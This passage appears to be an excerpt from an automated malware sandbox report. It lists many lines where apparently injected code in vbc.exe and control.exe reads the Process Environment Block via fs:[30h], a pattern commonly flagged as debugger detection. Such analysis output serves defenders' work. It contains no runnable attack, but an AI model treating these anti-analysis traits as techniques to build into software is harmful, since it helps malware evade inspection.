          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05482073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05491074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05447016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05447016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05447016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05494015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05494015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05443884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05443884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05498B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0547D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05495BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05454257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0547B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0547B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05498A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0540927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05404A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05404A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EC3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EDE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E436CC mov eax, dword ptr fs:[00000030h]
